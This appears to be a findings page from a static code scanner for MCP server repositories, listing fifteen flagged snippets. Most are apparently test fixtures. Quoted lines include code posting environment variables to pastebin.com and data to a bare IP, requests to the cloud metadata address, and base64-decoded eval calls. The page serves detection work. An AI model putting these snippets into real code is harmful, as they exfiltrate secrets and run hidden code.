Code analysis

static source read inferred

Static code-analysis findings — hidden prompt content in shipped skill files, committed secrets, dynamic-exec sinks, and suspicious call-home endpoints — across the analyzed catalogue. Heuristic, pure, no code executed; every row deep-links to its source. Click a kind to filter.

analysis coverage 86% of 59,694 analyzable servers
51197 analyzed
7502 re-analysis due
995 not analyzable
0 not yet analyzed
4849 source gone
not analyzable
795 too large 200 no source

Running analyzer v33. The scanner changelog explains what each version detects and when it changed.

code findings 15 shown
  1. MEDIUM suspicious endpoint perfectra1n/kubesearch-mcp 169.254.169.254 (cloud metadata) "https://169.254.169.254/latest",
  2. MEDIUM suspicious endpoint templated-io/mcp-server-templated 93.184.216.34 if (String(url).startsWith("https://93.184.216.34/")) {
  3. MEDIUM suspicious endpoint templated-io/mcp-server-templated 93.184.216.34 const ok = await assertPublicUrl("https://93.184.216.34/logo.png");
  4. MEDIUM suspicious endpoint templated-io/mcp-server-templated 169.254.169.254 (cloud metadata) await assert.rejects(() => assertPublicUrl("http://169.254.169.254/latest/meta-data/"), /public host/);
  5. HIGH dynamic exec claudish new Function() const ret = new Function(getStringFromWasm0(arg0, arg1));
  6. MEDIUM suspicious endpoint alialrikabi313/hares 169.254.169.254 (cloud metadata) b: { $ref: "http://169.254.169.254/latest/meta-data/" },
  7. MEDIUM suspicious endpoint alialrikabi313/hares pastebin.com 'requests.post("https://pastebin.com/api", data=dict(os.environ))',
  8. MEDIUM suspicious endpoint alialrikabi313/hares 169.254.169.254 (cloud metadata) 'requests.get("http://169.254.169.254/latest")',
  9. MEDIUM suspicious endpoint alialrikabi313/hares 185.220.101.5 const found = await scan('import requests\nrequests.post("http://185.220.101.5/c", json=d)\n');
  10. HIGH obfuscation alialrikabi313/hares base64 decode → exec sink eval(atob(blob));
  11. HIGH dynamic exec alialrikabi313/hares vm exec vm.runInNewContext(code, ctx);
  12. HIGH dynamic exec alialrikabi313/hares new Function() const f = new Function("a", "b", "return " + expr);
  13. HIGH dynamic exec alialrikabi313/hares eval() eval(payload);
  14. HIGH dynamic exec alialrikabi313/hares vm exec return vm.runInNewContext(expr);
  15. HIGH obfuscation alialrikabi313/hares base64 decode → exec sink eval(atob("ZXZhbChhdG9iKFN0cmluZyh4KSkp"));